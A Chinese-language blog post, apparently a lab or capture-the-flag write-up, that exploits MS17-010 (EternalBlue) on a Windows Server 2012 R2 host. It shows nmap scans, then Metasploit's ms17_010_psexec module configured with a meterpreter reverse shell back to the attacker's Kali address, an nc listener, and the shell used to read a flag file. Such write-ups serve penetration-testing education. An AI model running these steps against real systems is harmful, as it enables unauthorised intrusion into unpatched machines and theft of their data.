永恆之藍

即使漏洞修補了兩年, WannaCry 仍是使用EternalBlue 漏洞攻擊手法中,偵測到最多的勒索病毒

這篇Blog有許多圖表看起來比較厲害，有興趣的同學可以自行去了解。這麼經典的漏洞應該都補起來的吧!就在上個月鐵人賽剛開始的時候，我被三個單位召喚去處理他們不想把Windows 7桌機換掉但是Line不能使用的問題(2024年9月)，接下來年底據說是iPhone 6的Line不能使用。更別說今年暑假在某間研究室還看到教授使用一台XP，召喚我去處理印表機驅動。

特徵

經典歸經典，現場環境還是有各種的可能性存在。本題透過弱點掃描可以看到172.16.x.x有開啟SMB服務，並且符合ms17-010的一些條件(2008 R2, not required, user)，因此發現存在ms17-010的機率很大。

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|   message_signing: disabled (dangerous, but default)

SOP

首先一樣透過nmap進行弱點掃描，可以看到目標主機開啟了135,139,445,5985,49155，其中5985是WinRM服務，至於49155可能是SMB用來做回應的動態端口。

nmap -p- 172.16.x.x

進一步掃描找到ms17-010特徵。

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p135,139,445,5985,49155 -sC -sV -O 172.16.x.x
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 23:01 EDT
Nmap scan report for 172.16.x.x
Host is up (0.64s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49155/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-02T03:02:52
|_  start_date: 2024-10-02T17:04:27
|_clock-skew: mean: 2h20m02s, deviation: 4h02m29s, median: 1s
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: WIN-SU2M9G4F4S5
|   NetBIOS computer name: WIN-SU2M9G4F4S5\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-10-01T20:02:52-07:00
|_nbstat: NetBIOS name: WIN-SU2M9G4F4S5, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:01:36:95 (Microsoft)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.46 seconds

Metasploit

這裡就偷懶開始使用msfconsole，search ms17-010

┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf6 > search ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

這邊選擇第10個PoC做滲透

msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) >

依照我們前面的SOP。查詢kali攻擊機IP並設定好nc。😒

┌──(kali㉿kali)-[~]
└─$ ip addr

3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 192.168.200.9/24 scope global tun0

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443

記得要設定LHOST,LPORT,RHOSTS，可以用show options確認設置正確。

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 172.16.x.x
RHOSTS => 172.16.x.x
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.200.9
LHOST => 192.168.200.9
msf6 exploit(windows/smb/ms17_010_psexec) > set LPORT 443
LPORT => 443
msf6 exploit(windows/smb/ms17_010_psexec) > run

[-] Handler failed to bind to 192.168.200.9:443:-  -
[-] Handler failed to bind to 0.0.0.0:443:-  -
[-] 172.16.30.4:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
[*] Exploit completed, but no session was created.

run執行等待一段時間會取得shell連線，當然也可以看起來專業一點的輸入exploit指令。在提示符號">"後輸入shell指令可以獲得一個互動式的shell:

meterpreter > shell
接著去找出電腦上的secret.txt，但是根據錯誤提示，端口 443 可能已經被其他程序佔用，這導致 Metasploit 無法在該端口上啟動處理程序（handler）。ㄜ~原來nc不需要啟動，只要把 Metasploit 打開就做完其他工作了。

secret

meterpreter > shell
Process 132 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>dir / secret.txt -s

meterpreter > shell
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > search -f secret.txt

[*] 172.16.x.x - Meterpreter session 1 closed.  Reason: Died

在這裡我的連線突然被關閉了，應該要重新連線一次或是等幾分鐘後重來。然後就是打靶機常會需要的通靈技巧突然就知道要尋找「secret.txt」，找到位置之後然後就可以透過type看到FLAG的內容了!!

c:>type c:...\secret.txt
or
meterpreter > cat c:\...\Secret.txt